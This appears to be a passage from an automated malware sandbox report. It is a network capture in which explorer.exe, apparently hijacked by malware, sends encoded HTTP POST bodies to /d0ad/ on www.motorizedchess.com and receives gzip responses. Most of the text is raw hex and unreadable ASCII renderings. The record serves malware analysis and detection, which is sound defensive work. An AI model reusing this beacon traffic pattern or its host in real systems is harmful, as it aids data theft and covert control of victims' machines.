83 99 80 b0 e1 f0 9c bb 64 46 13 f1 f4 59 40 4d db 0d 83 1d 9f ea de 58 62 c8 2e e9 e8 de 04 07 70 5d 78 ad db 58 39 a0 47 4c 4c 6a 3d c6 2c ab b7 1e 13 97 52 49 3c 2e 2e 01 a1 62 07 b3 ec 78 66 5a 46 c6 31 8c 5d 29 36 35 5a 4e 8a f8 f3 88 d4 11 8c 46 57 e0 1e c3 b9 1e 8c 67 d4 df db d2 Data Ascii: 1483<SW/0`0RjYRt!l ~DHnod7't{ZMQ;/n!dNgI(ErS`=I,UHs5.{;,8809}\|?6crN?oTWsvqcNi+dFG3tta~9LN+@n$qb6VHhIDXf}Wl]z^j#gK4!ci6RW7H2li9>O[\|~$XcAU" 9)~fxDVP@[9IXj`CUnZSbn'C3+d?d]KY^8TsIZIL<aI"@Mj-Tb;6Mg.7F>1"Qxkd\|M\|'m=#m9Orq?v34ITeGD$U3t`b9&=mxj%b$5:#)AVBz,pkdqk4nSHl`7$rE'zTf(8$lLMx('9uf#nR=>mCN(g- d'>H"JO-:N"ap2b?>Bn6"`10 )dFY@MXb.p]xX9GLLj=,RI<..bxfZF1])65ZNFWg
Oct 26, 2022 13:18:15.766333103 CEST	1201	IN	Data Raw: 2d 1b 33 09 bf 7f 5f cb 31 5b 68 64 60 bb 42 ef 3f 77 2c f0 9a 9e 63 dc 52 0b 82 61 c2 a0 64 52 e4 95 12 1a 46 df d2 03 7a ee d1 f5 b3 29 04 c1 3d 8b c8 58 be 8a 38 62 d7 7d be 6d c9 92 35 b2 25 28 2e 48 49 84 2e 6e 36 ae 1e cc 86 09 b3 10 85 44 Data Ascii: -3_1[hd`B?w,cRadRFz)=X8b}m5%(.HI.n6Da3fYdOrgnNKd>\|4q8vMi(>pB\|MD1<WI%&4"^B&Z##a,#)%GU3"82@#!
Oct 26, 2022 13:18:15.766400099 CEST	1202	IN	Data Raw: 0a 1d 4d 3e f4 9d 79 04 b6 be e1 24 00 f7 5e 78 ef 04 1b 8f 1f 32 48 87 09 c7 6e f9 b7 f0 cf 89 ca 99 66 c1 c2 38 98 c1 fb df 7e 8b 8f f7 14 d6 bf 98 5f 35 e8 d8 6b 2e 80 e8 2b 81 2e 93 66 e8 d3 7b f1 09 2c 8d 27 13 42 35 38 70 c0 09 0d 3a d1 43 Data Ascii: M>y$^x2Hnf8~_5k.+.f{,'B58p:C+3Ay6@k$GyNCh5A$$g5vh1I"V%tS1Wd[:,aF$62<X~WGf": NQQK
Oct 26, 2022 13:18:15.766452074 CEST	1204	IN	Data Raw: cd b2 32 e9 44 8b f5 17 25 f4 23 88 af e9 5d ec 82 15 fa 65 0d c9 08 15 7e 57 4a d9 04 4c 00 c8 bd 5e 9d c9 f2 5c 9f fb e0 53 33 93 f9 50 41 cd 52 dd 33 00 24 53 a2 2c d8 41 09 3d ae 04 d9 34 b8 9c 41 c7 bd ed 80 32 59 1c 5c e8 56 48 89 09 51 0b Data Ascii: 2D%#]e~WJL^\S3PAR3$S,A=4A2Y\VHQl4X]{EG){GY2PLAk0rF9WC 8*c{-Q~3>3UUxV2gf!ABmX$TSSy%$fp%tl3cu
Oct 26, 2022 13:18:15.766495943 CEST	1204	IN	Data Raw: c5 4d f0 b9 f4 79 b4 2a ac 46 83 c6 70 7e 4f bf 1d 4e 42 7a 76 73 7c 76 b1 1a 9d d9 f9 fd 4f 67 cd e3 b2 65 7e ba f8 ef de d5 f8 6a d8 76 4c bb 74 6c dc 1c 69 dc 1a fe 02 2b c4 ab 1a e2 5a 8f b8 b7 20 ee fd f3 4b 45 78 43 43 bc 17 b7 ef 53 78 c5 Data Ascii: MyFp~ONBzvs\|vOge~jvLtli+Z KExCCSxaOr:<]"x]7A&%4F/W=e/~Sta3hZz"~U7Y>kfm;rFj-:x]sXv

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.11.20	49896	216.40.34.41	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:17.732384920 CEST	1206	OUT	POST /d0ad/ HTTP/1.1 Host: www.motorizedchess.com Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.motorizedchess.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.motorizedchess.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 38 67 66 48 63 41 37 69 68 5a 53 55 52 78 76 49 4f 44 43 43 36 5a 70 56 66 36 41 39 65 73 67 46 77 4e 42 74 50 6e 36 38 77 62 79 68 4f 58 67 41 61 54 73 39 37 57 65 6a 59 49 42 35 71 70 46 41 33 41 4b 57 73 4c 45 2d 49 4b 43 35 68 62 55 62 49 4b 64 33 71 6e 62 6d 30 61 4c 59 4a 38 7a 64 6f 38 45 7a 74 49 50 42 36 5f 54 49 7a 75 53 73 6e 30 56 64 32 46 7e 61 47 53 74 42 54 53 6d 43 76 65 6d 36 53 37 6f 6e 79 4a 65 4a 51 54 50 50 6f 67 78 73 71 4f 38 5f 45 52 64 59 54 52 7a 44 62 4a 4a 55 58 32 38 79 6e 66 78 41 43 46 6f 34 6a 5a 66 31 77 76 46 53 51 50 6c 62 43 2d 74 4e 59 5f 59 55 70 46 4e 64 48 77 6f 71 64 78 70 46 77 45 61 5a 64 43 28 45 63 2d 77 62 50 54 53 52 6f 45 6d 71 73 63 4a 68 55 34 32 38 28 68 6e 30 69 70 43 42 59 50 47 71 41 75 6a 6b 63 79 67 6f 4e 31 78 4b 44 64 66 73 43 6c 42 44 6c 5a 43 75 6a 77 32 77 70 77 74 56 41 41 48 57 34 54 4c 35 4b 65 5a 48 4a 61 4b 39 39 58 34 66 62 53 59 6e 58 59 76 49 71 6e 6b 4b 50 67 59 4d 59 6f 55 68 31 45 45 71 61 6f 67 71 49 61 35 78 71 70 6e 53 73 7a 4e 51 34 45 45 4e 7a 62 34 78 73 61 78 35 75 6b 42 4c 63 76 6b 75 63 43 44 6c 62 33 35 43 7e 6e 61 69 4c 51 73 50 6c 51 4f 31 4d 6b 6a 6b 50 44 38 59 69 6f 6e 6e 42 6a 77 65 75 4e 33 32 4f 44 72 5f 46 4e 68 56 69 36 6f 37 7a 48 6e 6e 65 65 5a 4e 32 54 4d 51 6f 37 32 63 49 69 36 46 53 61 66 4e 6f 4b 52 65 31 63 54 47 61 49 51 57 7e 4e 7a 50 69 35 56 4a 42 78 58 53 28 54 28 50 28 70 33 61 51 78 31 32 53 7a 43 36 69 6b 61 32 37 66 61 4f 42 50 4a 52 48 7a 72 42 6e 46 4a 42 55 47 68 69 78 43 7a 4c 62 42 76 4c 48 63 45 43 7e 30 37 63 4d 35 37 37 37 54 38 6e 28 36 54 49 45 70 45 4e 70 49 38 56 48 38 30 72 63 62 7e 4e 78 47 78 54 48 73 34 61 7e 6b 65 48 59 72 35 48 70 44 52 72 43 64 7a 75 64 7a 36 66 71 61 57 7a 73 48 69 56 73 33 62 54 45 36 32 66 65 69 59 52 49 71 46 42 72 51 6f 39 67 38 73 31 61 37 52 30 59 5a 51 65 48 64 54 76 61 38 4d 65 4c 34 4e 4f 72 59 64 44 4a 70 56 59 4e 63 7a 42 42 36 77 59 78 6c 35 5a 67 68 65 68 42 43 69 50 43 78 53 6e 58 43 50 6c 67 4b 36 69 76 36 74 57 4d 6a 68 4e 63 68 4a 54 6e 57 51 51 34 71 38 6d 28 68 72 77 48 30 79 55 30 54 55 39 79 6f 43 33 43 4f 4c 77 69 32 48 41 64 58 5a 48 66 39 67 5f 65 35 33 4d 73 72 58 69 45 37 70 77 76 78 50 74 64 6c 4e 47 6d 46 34 58 62 69 77 49 46 6f 67 6f 53 64 63 55 47 39 6e 66 73 6b 5a 38 31 46 35 37 73 44 6b 45 31 47 61 75 77 6f 42 75 73 74 55 58 6c 42 6a 6e 38 56 66 4d 70 48 57 39 63 67 66 75 57 46 6d 63 45 37 50 55 30 6f 6c 6a 52 2d 47 67 44 6b 7a 56 4f 53 77 76 4f 7a 68 51 35 38 38 73 53 57 4a 4a 7a 2d 38 69 56 73 72 45 4c 4e 44 64 67 46 32 78 67 78 49 32 41 52 49 46 54 47 75 77 37 56 4b 30 45 75 7e 37 6a 65 Data Ascii: jXu=8gfHcA7ihZSURxvIODCC6ZpVf6A9esgFwNBtPn68wbyhOXgAaTs97WejYIB5qpFA3AKWsLE-IKC5hbUbIKd3qnbm0aLYJ8zdo8EztIPB6_TIzuSsn0Vd2F~aGStBTSmCvem6S7onyJeJQTPPogxsqO8_ERdYTRzDbJJUX28ynfxACFo4jZf1wvFSQPlbC-tNY_YUpFNdHwoqdxpFwEaZdC(Ec-wbPTSRoEmqscJhU428(hn0ipCBYPGqAujkcygoN1xKDdfsClBDlZCujw2wpwtVAAHW4TL5KeZHJaK99X4fbSYnXYvIqnkKPgYMYoUh1EEqaogqIa5xqpnSszNQ4EENzb4xsax5ukBLcvkucCDlb35C~naiLQsPlQO1MkjkPD8YionnBjweuN32ODr_FNhVi6o7zHnneeZN2TMQo72cIi6FSafNoKRe1cTGaIQW~NzPi5VJBxXS(T(P(p3aQx12SzC6ika27faOBPJRHzrBnFJBUGhixCzLbBvLHcEC~07cM5777T8n(6TIEpENpI8VH80rcb~NxGxTHs4a~keHYr5HpDRrCdzudz6fqaWzsHiVs3bTE62feiYRIqFBrQo9g8s1a7R0YZQeHdTva8MeL4NOrYdDJpVYNczBB6wYxl5ZghehBCiPCxSnXCPlgK6iv6tWMjhNchJTnWQQ4q8m(hrwH0yU0TU9yoC3COLwi2HAdXZHf9g_e53MsrXiE7pwvxPtdlNGmF4XbiwIFogoSdcUG9nfskZ81F57sDkE1GauwoBustUXlBjn8VfMpHW9cgfuWFmcE7PU0oljR-GgDkzVOSwvOzhQ588sSWJJz-8iVsrELNDdgF2xgxI2ARIFTGuw7VK0Eu~7je
Oct 26, 2022 13:18:17.890589952 CEST	1215	OUT	Data Raw: 32 79 32 6c 56 50 35 74 33 72 4b 66 46 50 35 75 72 41 73 38 75 43 65 4a 59 53 4e 6a 4d 6a 77 34 69 6a 78 41 53 54 28 78 70 61 74 39 6b 44 69 38 28 4d 57 44 44 39 67 55 67 6e 69 42 43 6c 73 5a 77 6c 7a 42 32 50 72 50 50 5a 66 51 54 70 4f 41 72 6b Data Ascii: 2y2lVP5t3rKfFP5urAs8uCeJYSNjMjw4ijxAST(xpat9kDi8(MWDD9gUgniBClsZwlzB2PrPPZfQTpOArk2shcUOr2PP5V8XZ5TCEpu44on70neBgfpkPoHMsoapc4y5dVSSztnRNExGg_YUZ2iiT_bBfzUFSxae1haO8Pm5HTK0BwEHc7kxHt2zDc7sqqnXnTwbXkXH67WzJhev479gpCVHaN8sm_UZEf7aH0HBkUQ6oJ9TPuZ
Oct 26, 2022 13:18:17.890743017 CEST	1220	OUT	Data Raw: 48 47 6f 38 59 58 52 30 28 34 73 59 49 4a 32 61 58 4d 46 63 65 44 52 36 72 42 31 4e 33 44 4a 39 52 68 76 5a 47 72 70 4c 6f 59 78 61 70 2d 53 51 78 53 36 48 30 4f 63 65 6c 70 6b 2d 64 36 72 65 48 34 53 55 58 45 35 46 73 6d 68 39 64 65 6b 76 30 42 Data Ascii: HGo8YXR0(4sYIJ2aXMFceDR6rB1N3DJ9RhvZGrpLoYxap-SQxS6H0Ocelpk-d6reH4SUXE5Fsmh9dekv0BYJ7Bpx(P6x4ayYkt6_AC3J8WL-Pzgyq5kfl8zhDKLj7cC1Crow9ZU25czEUNRKtICliOLTc9qUF2Zt9ANUaCJqfE6coBjUrdUnPM0jaBJoXjNOxuFMh9zz79K8p3ETQMdsNhqZDcwmmv1wLPvg2j24sUK_~gUrW38
Oct 26, 2022 13:18:17.992898941 CEST	1223	OUT	Data Raw: 7a 73 44 54 6e 62 6b 34 4a 42 65 68 32 73 77 6f 4e 6d 4e 68 38 54 6c 4b 66 77 37 4c 70 47 35 52 48 6c 4a 4f 31 2d 69 50 41 77 5a 51 39 32 49 39 6c 6b 6a 33 74 4b 77 65 4e 4d 52 37 34 72 66 6d 28 35 42 7a 51 76 6a 61 32 47 57 43 43 56 49 73 31 59 Data Ascii: zsDTnbk4JBeh2swoNmNh8TlKfw7LpG5RHlJO1-iPAwZQ92I9lkj3tKweNMR74rfm(5BzQvja2GWCCVIs1YzROh0Rkw4lqgWRz2tsVX3GNlS2shjokAwmr_c326QZG6BAPaaoktMaMXP2AKWYiZG7hxo-3czlgLj-2UYfQXy5QJd1VHPKdiN25C0NHEy4TWml1II0prybEK5-tBG_Y-MjSLKZDjzuT1(jp3YqbeIefE(6KKibjIT
Oct 26, 2022 13:18:17.993068933 CEST	1235	OUT	Data Raw: 39 76 6d 34 6c 6a 59 56 58 45 5a 48 57 36 55 57 7e 62 55 38 41 39 45 4c 57 7a 70 41 69 64 52 53 44 45 73 52 46 5a 6a 32 72 7a 46 2d 47 31 6d 79 69 48 44 54 36 6f 4b 64 67 76 45 47 35 66 7e 71 42 6c 6c 75 38 4a 66 74 5a 77 47 4b 32 59 55 31 34 58 Data Ascii: 9vm4ljYVXEZHW6UW~bU8A9ELWzpAidRSDEsRFZj2rzF-G1myiHDT6oKdgvEG5f~qBllu8JftZwGK2YU14XyBxluymAM2nfFb6EtYMem_5qVjQjZakCT67vNlEJofbh~Og8dNBh5RhNNKxA(24V8x~zFdaiSkbQOJ78APBXb-fSCIfIhNGxbF86FDJeHQtl~ISWX-RQwh(k2_uRjUI7An9yT9K71dG2doJr17zNJqFCEruhNZfQT
Oct 26, 2022 13:18:17.993319988 CEST	1238	OUT	Data Raw: 67 5f 45 79 73 53 63 5a 4a 51 7e 71 47 5a 34 4f 6d 5a 45 56 58 4c 50 53 33 51 50 33 6a 66 55 30 28 36 61 35 4c 6c 38 55 4d 44 31 4d 45 4b 7e 34 59 4d 59 42 61 32 28 6a 51 46 33 56 77 42 71 45 7e 30 66 6e 52 4c 61 65 31 6c 7a 61 55 75 44 62 46 6c Data Ascii: g_EysScZJQ~qGZ4OmZEVXLPS3QP3jfU0(6a5Ll8UMD1MEK~4YMYBa2(jQF3VwBqE~0fnRLae1lzaUuDbFlxIYB5q8M3H~V6v~8ncjNL0CyxK9eX2EW~Vxg5s4XkQNGYb49OIeAd72Vzg8nNgPH1siVdODfkbbrv2y3IP0WYnuwOjm8MqRgp3SPq4y_isryWYxzshpAi6EPbMXuIIoQt7D_u5UVtM8AxxcjOsQcXdUSkDT6NKXPk
Oct 26, 2022 13:18:17.993486881 CEST	1241	OUT	Data Raw: 5a 62 73 34 5a 38 45 62 47 73 34 32 64 4b 71 62 45 39 43 52 73 4b 7e 4f 49 6c 49 33 4e 77 50 54 72 42 63 61 61 50 6c 4d 7e 68 56 4c 61 77 74 65 28 6f 34 59 65 31 30 37 79 35 4a 53 63 45 78 4d 64 4e 32 72 4a 39 6d 66 56 73 39 2d 4b 37 30 4d 65 6a Data Ascii: Zbs4Z8EbGs42dKqbE9CRsK~OIlI3NwPTrBcaaPlM~hVLawte(o4Ye107y5JScExMdN2rJ9mfVs9-K70Mej6eYE9Jn988(ucVtaXzHsqV5PIiASxBdzTmWahzeyAzXfcLv4xbDetFUzoizp5AJllwiUpJrPjQXNdQWXaAd9Ee5CLsLRLGKk5_O3hDot5is3(kviTLBb6pnstonZ6KQ3zdE2TlUW(FXMCGBwT7yI~1RkIiemRi5Fl
Oct 26, 2022 13:18:17.993669033 CEST	1246	OUT	Data Raw: 35 72 6f 56 54 45 79 30 4e 31 59 36 6a 52 68 62 4d 6b 77 69 63 31 38 31 66 37 66 6b 4b 6e 64 49 39 38 62 6d 66 55 32 47 61 79 31 58 61 48 78 67 6a 31 69 35 38 7a 79 59 75 33 42 79 49 73 30 33 78 30 47 38 35 72 38 36 53 65 37 38 7a 38 53 52 46 38 Data Ascii: 5roVTEy0N1Y6jRhbMkwic181f7fkKndI98bmfU2Gay1XaHxgj1i58zyYu3ByIs03x0G85r86Se78z8SRF8w-LtUSrBuZfDFaTfxYqbbSTlOhDDVerfK24pIy4X~rQdJi~cFGrrPhHZRxW8nP7AWQedBZOUrRmvvItWZuduyCZyYTPGXhSoBaUjRZpxlHeTjxwQcYLJGuW_WEuGgxAdmDYlurTCPpnjYHXUvkDckcT6efnpDAcFj
Oct 26, 2022 13:18:18.046526909 CEST	1248	OUT	Data Raw: 65 32 44 64 36 54 6f 6e 4d 39 77 4d 47 4a 28 46 45 4f 71 30 4b 7a 49 4d 6c 65 42 46 28 5f 33 46 72 43 32 6b 77 4a 78 52 6e 66 31 53 66 49 47 6f 75 6d 6c 31 54 65 42 66 49 57 75 31 67 47 6b 4d 4f 77 62 77 30 4c 38 71 55 62 53 63 57 51 76 79 74 65 Data Ascii: e2Dd6TonM9wMGJ(FEOq0KzIMleBF(_3FrC2kwJxRnf1SfIGouml1TeBfIWu1gGkMOwbw0L8qUbScWQvytekj~2wVTI22Sd4vmjG1TjjrExah5uIGBKO1yl90WAfd1tCWOqN3J2iQN7TriLk_rJtqTf~xZQAbv9xvvp8fiqvaVrKQLbIt6fmVtP343Aser5UdSNq3ogfRynZxGaIqC_28q1~l7HpAaf~-KpD3x5T2Zf~jv2dwWEa
Oct 26, 2022 13:18:18.095366955 CEST	1256	OUT	Data Raw: 45 70 59 56 69 56 79 41 55 51 45 78 56 66 46 63 44 34 55 32 36 41 6c 67 43 74 30 34 6d 54 39 35 62 75 31 34 6b 72 35 58 50 59 74 32 33 30 69 6e 65 63 69 41 34 71 75 77 79 59 72 44 35 78 76 57 70 72 6d 55 67 7a 43 47 6b 41 4d 35 33 71 56 63 38 4a Data Ascii: EpYViVyAUQExVfFcD4U26AlgCt04mT95bu14kr5XPYt230ineciA4quwyYrD5xvWprmUgzCGkAM53qVc8JG6xNIW8hI5RsZReO1sJ51L~AkmimUZ9tn-DDCDXo6mfx8gjrRDR-hQPxwuqTkvQf9QIVYTiDW-wK0YUQjE3mAjs1SILpBqV1J1JIRByjGxbPwSaL68w7w-7wR8Efn7xpxBUugBohQSZ5Dwn-MW~SEcreKlw9JKbbC
Oct 26, 2022 13:18:18.095468044 CEST	1257	OUT	Data Raw: 75 33 34 54 34 79 38 54 78 57 34 45 41 70 75 7a 42 77 6c 53 59 59 39 35 73 42 72 42 32 71 69 52 5a 7a 56 65 45 59 61 33 45 50 51 6c 68 62 32 4f 34 37 79 35 58 32 7a 66 55 68 69 74 71 50 4f 6c 51 74 64 61 35 7a 4c 61 6c 54 59 62 7e 75 73 5a 6d 74 Data Ascii: u34T4y8TxW4EApuzBwlSYY95sBrB2qiRZzVeEYa3EPQlhb2O47y5X2zfUhitqPOlQtda5zLalTYb~usZmti9cmzjarI0aPaEXA~bIOVd2fMpW98Ml7ayp9f48pc5orbK(sjIyAz3I8HRjvKRo1744kv_iu70OTpJhlIYAh17TqvlVqkiRod4C_(tUM28XPDpHn935dpW0HjU6B0fRr(7xV6KIMAWNSKbveHkyhqWZuHW2pPs8cX
Oct 26, 2022 13:18:18.254731894 CEST	1259	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.2 Date: Wed, 26 Oct 2022 11:18:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Request-Id: e06af55a-4cec-47c4-af9d-284284c3b6bd X-Runtime: 0.052512 Content-Encoding: gzip Data Raw: 32 30 30 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 67 b3 e3 56 76 28 fa dd bf 82 b7 a7 9e 9b ba 1e 76 13 00 91 34 92 5c 20 08 10 4c 00 89 40 04 d7 14 8d 9c 03 91 01 5f f3 b7 bf 4d 9e dc 2d cd c8 a3 fb 3e bc aa e9 53 ea e6 01 76 58 7b e5 b4 a9 9f fe d7 4a a0 65 fd c8 4c 82 3a 4d 7e f9 97 9f ee ff 4c 12 33 f3 7f fe e4 66 9f ee 0f 5c d3 f9 e5 5f 26 93 9f 52 b7 36 27 76 60 96 95 5b ff fc a9 a9 bd 19 f1 69 f2 f5 f1 aa 0e eb c4 fd 85 b2 eb 30 cf 26 74 9e d5 65 9e 24 6e f9 e3 84 e9 6d b7 78 3c b5 cd c6 0f ea 9f be 3e 0d bd 4f aa ea 01 4c 02 9f 26 13 2b 77 86 c9 7f 3d 3e 82 5f 4c 3b f6 cb bc c9 9c 99 9d 27 39 58 e5 4f 2c 75 ff f9 cb f3 80 97 a7 08 82 bc 3c 4a cd d2 0f b3 1f 27 f3 a2 7f 7a f4 df ff f2 ba f0 9f 27 c5 9f 27 79 f2 e7 49 03 fe ab 9d d7 7d 3c 00 e7 cc 33 d3 30 19 7e 9c 04 6e d2 ba 75 68 9b 7f 9e b4 6e e9 98 19 f8 60 96 a1 09 a6 54 66 56 cd 2a b7 0c bd 97 dd 1e 33 ab 70 74 7f 04 e0 42 c8 cb 9e 93 49 12 66 ee 2c 70 43 70 d2 1f 27 10 f1 0d 30 45 e9 7e dc fc 69 09 08 7a 5b a0 0b c2 da 9d 55 85 69 83 b5 c1 f8 59 57 9a c5 87 13 81 87 5f ac bc 7f c3 56 5e 3a 77 4c 83 45 26 55 9e 84 ce e4 4f 0c c3 bc 40 5a 98 8e 13 66 3e 78 fd 8a 99 c9 e4 3b 64 4d 26 5d e8 d4 c1 8f 13 12 fd 16 e6 3b f5 dd f2 75 b7 57 82 cc 59 f0 f3 b2 cb 1b c5 00 ad 68 14 66 e1 c5 77 00 cc bf a0 6e 3a 81 ee 7f 7f 38 4f 00 bd 2e fe 0a d7 17 18 0c 7d 5d fd 23 52 bf 40 2f 0b 4c 26 ef e8 00 66 7c 5c 16 fe 0e e6 8f 80 7d 58 15 46 bf 21 d5 17 07 30 7b 98 54 7f 0b cd ab f9 fd e7 15 07 0f 3a cc 4a d3 09 9b ea c7 c9 e2 8d a6 2f c7 02 80 bf f1 e7 64 e2 84 55 91 98 80 f5 ac 24 b7 e3 97 65 5e 08 81 7f 4b 88 2f 55 93 82 95 de c4 e4 95 b4 60 e4 04 7a 3d c0 5d 98 1e 90 58 79 5d e7 e9 07 c6 f8 08 f1 af 01 f0 2c 36 af c7 7f cf b2 2f e7 f8 6e ab 1f 27 59 9e b9 1f d0 ff 27 1b 88 88 09 a4 e1 8d 75 00 d3 de 65 e6 c1 8d af 20 3e 4b eb 2b 03 42 f3 f9 ff f3 3d eb fc 0a db 7c a9 f2 a6 b4 dd c9 ff fe 9e 7b de 30 ff 8a a2 6f d5 c2 cb ec ff 7a 51 39 df 0b d1 8a bc ff bc 52 f7 55 27 01 0e 67 e8 fb cf ef a0 d8 13 88 ef 71 f8 41 1e df 73 c3 13 46 7e 05 93 2f a0 7e 71 4c a0 7e 5f 00 7e c7 f9 c4 1b c6 72 a0 ba bc 24 ef 7e 9c 98 4d 9d 7f 0f fb 9b 3e 65 d9 0f e4 fa 12 66 5e fe ba f8 1b da be 93 d6 8f d0 7c b9 0b d1 25 6b 52 cb 2d df 89 ca f7 fa fb 23 c6 5e 94 08 45 bd aa f4 37 bc 00 21 79 db f5 95 99 cb 67 95 fa a6 e4 56 ab d5 cb 01 6b b7 af 67 66 12 fa c0 00 3c 06 7e 3c db 1d c8 6f cf 36 4b 5c ef ae a2 df 69 c5 6f 55 ef f7 8b fc 18 dc 11 fc a6 12 be 3f 27 8b dd 7f be 9f f9 c5 04 a6 b1 7d 83 e2 d7 4c 1c 4b 83 3f 1f a7 06 a1 e3 b8 d9 eb 86 af 02 fb 9d b8 01 c6 98 bc 60 95 24 e6 e4 1c fd cb e4 bf 1f bc 6d fe d8 86 15 b0 29 c0 ec bd 8e c0 30 ec f5 f5 97 ba 04 b6 66 e6 95 66 ea 02 12 fe ea 98 97 73 bf be 7c d6 a4 2f 5b 7c 58 e3 4b e5 26 ae fd 71 c3 a7 f1 60 f8 b3 b8 fd 09 58 f7 da bd d4 a6 95 bc e0 e4 55 f7 3f 61 e0 59 41 80 33 25 66 51 01 5b f8 f2 e9 fe fa b1 ce 87 35 ea bb 99 9a d4 2f b4 f9 46 03 c2 6f 5c e3 38 ce df 5e 01 d8 d6 bb da 7c c6 f9 37 0b bd e0 fd b7 01 78 99 5e 07 cf 2b 7c 23 f0 4f a7 fb 68 d1 9e f5 e9 ef 5a 34 cc 8a a6 Data Ascii: 200agVv(v4\ L@_M->SvX{JeL:M~L3f\_&R6'v`[i0&te$nmx<>OL&+w=>_L;'9XO,u<J'z''yI}<30~nuhn`TfV*3ptBIf,pCp'0E~iz[UiYW_V^:wLE&UO@Zf>x;dM&];uWYhfwn:8O.}]#R@/L&f\|\}XF!0{T:J/dU$e^K/U`z=]Xy],6/n'Y'ue >K+B=\|{0ozQ9RU'gqAsF~/~qL~_~r$~M>ef^\|%kR-#^E7!ygVkgf<~<o6K\ioU?'}LK?`$m)0ffs\|/[\|XK&q`XU?aYA3%fQ[5/Fo\8^\|7x^+\|#OhZ4
Oct 26, 2022 13:18:18.254769087 CEST	1260	IN	Data Raw: fe 53 e5 9a a5 fd b2 c3 ac 73 ad 38 04 02 50 14 e0 b1 99 dd 3d 87 bb 44 78 a1 9b fc d6 61 1f fe d6 6f a1 eb 9d 27 f1 db e8 7a 5e e1 c7 ac 0e 66 76 10 26 ce 34 77 9c 1f 5e d0 f6 5e 5b 7a f0 fd e7 37 b0 7e 5f e6 8b db 03 f1 b8 a4 66 6d 07 6e f5 e7 Data Ascii: Ss8P=Dxao'z^fv&4w^^[z7~_fmnh58nK:OP(>yJwv;n~o}7p.&zbxv$^;ffZ1seaQ?YN<OW:O&xvYwk&q
Oct 26, 2022 13:18:18.254797935 CEST	1261	IN	Data Raw: 6b b0 5f df b4 06 96 c7 74 2e 45 9e 27 0f d6 45 9e 24 e5 75 67 e0 a9 76 d9 e5 69 d4 47 10 5e 43 b6 bf e9 75 bf 06 06 ff 74 b8 ff 4e 04 f0 4f 87 fb 9d a7 ff 4f 87 1b 14 32 fe 46 04 f0 4f 87 fb 8f 44 c6 ff 74 b8 ef f9 9c 47 d6 e2 9f 0e f7 3f 1d ee Data Ascii: k_t.E'E$ugviG^CutNOO2FODtG?W^O=VOCrlRsNQfW-('Vy0d}`(>7<VnES#o)??fO=E}G8 j: O^.h@Y9oP^z'/w8BPv}I@
Oct 26, 2022 13:18:18.254827023 CEST	1263	IN	Data Raw: 7b 03 fb bc 12 e8 a5 06 4e 22 27 1f f6 13 60 58 df ad fa 62 fe 5e 8c de 03 28 70 9e bb 77 b6 95 04 fe c9 50 dd b5 e0 5d ed 85 59 9b c7 ee a3 9e 7f ef 16 06 37 34 80 5a 7a 3a db c7 d3 80 e9 f7 d9 53 a0 5e c1 5d 95 c6 be 97 03 de c0 ba 3b a3 7d 50 Data Ascii: {N"'`Xb^(pwP]Y74Zz:S^];}Pdn7{hrL)_KO\<eIl5?IuV<`>ykzh<EUoKW/@>{c5bPFK,Ng~8B8.}o
Oct 26, 2022 13:18:18.254853964 CEST	1264	IN	Data Raw: 7e 61 c3 02 9e c1 3d 35 0d 22 d4 ea a7 af d6 2f c0 17 28 7e 79 6a bb ff af a7 0b 1e 91 d6 3c 7d 78 84 cb 60 87 a7 df 08 df e3 6c 0a 0f 03 43 52 c4 be dd 08 2b 9a c6 8c e2 ec 61 14 e9 56 3e db f1 cb fa 98 61 44 67 0d 81 a0 f9 94 29 57 24 ae ba 91 Data Ascii: ~a=5"/(~yj<}x`lCR+aV>aDg)W$YjV{fh`)f J^XoK"oF,tu'x]*LS4/"Ng5_t`ylCO{YGYs&V6P01yXKRMP[9
Oct 26, 2022 13:18:18.254880905 CEST	1265	IN	Data Raw: 29 09 28 cd 70 fd 49 4d 12 ae 85 2e d6 55 aa 69 f4 88 0f a7 1c 2e e0 03 d5 ed f0 63 b6 d9 2f fa 18 da 1a 3a c8 7e b2 68 df 62 32 74 9c e3 c6 fe 44 a5 9d a6 6a d9 30 8d 90 ba 97 a5 40 3e c8 17 89 59 23 87 d2 b0 60 74 61 70 09 ca 9c 77 11 5d f7 24 Data Ascii: )(pIM.Ui.c/:~hb2tDj0@>Y#`tapw]${fXH&66GOVH2jjo9JZn(Q/>MP,}8YCAzI/?j#.DOK`~+[cL+PrF<]
Oct 26, 2022 13:18:18.255019903 CEST	1266	IN	Data Raw: c7 b2 5e b6 d7 ac 37 46 f0 35 62 37 64 ab dd 74 b9 32 d6 2c b1 cd 96 54 e8 db f0 26 1a d6 2d a1 af 54 df 3c 75 5c 5b c8 6b 7f 60 17 b2 bf 2f 14 19 ee 36 c4 2a 45 25 62 96 84 fd 99 60 b6 b6 63 0c 9d 8f 76 c8 74 05 0d 3e 1d 9a ad c2 1e 2c 07 55 e7 Data Ascii: ^7F5b7dt2,T&-T<u\[k`/6E%b`cvt>,U2_"nkUds.m.c9n]4i?L\^\=-\|jEW@V-BB]^0r+-#GG!5+CT+3dtxPMt:pjU
Oct 26, 2022 13:18:18.258989096 CEST	1268	IN	Data Raw: 34 30 30 30 0d 0a 71 3d 1d f8 f6 4c 2f 6a e1 1a 61 e2 a5 d9 d5 05 91 8a 7b 33 3a cc f6 83 71 9d 96 05 61 e7 15 b2 82 e5 cd da db 6e 5c 8b 75 78 78 17 ad 3a c7 5b 27 5e c1 21 38 3d 8f 74 2c ab c4 63 52 c2 d9 66 67 f7 cb 04 5e af 15 07 2e fb 70 b9 Data Ascii: 4000q=L/ja{3:qan\uxx:['^!8=t,cRfg^.p{z.#z,whnmdq~\EtJG et9"FFmiU0M+4h;g+L.,?7;,l:fME,'A:7HbIwXb\kvZdJ:FnuSV
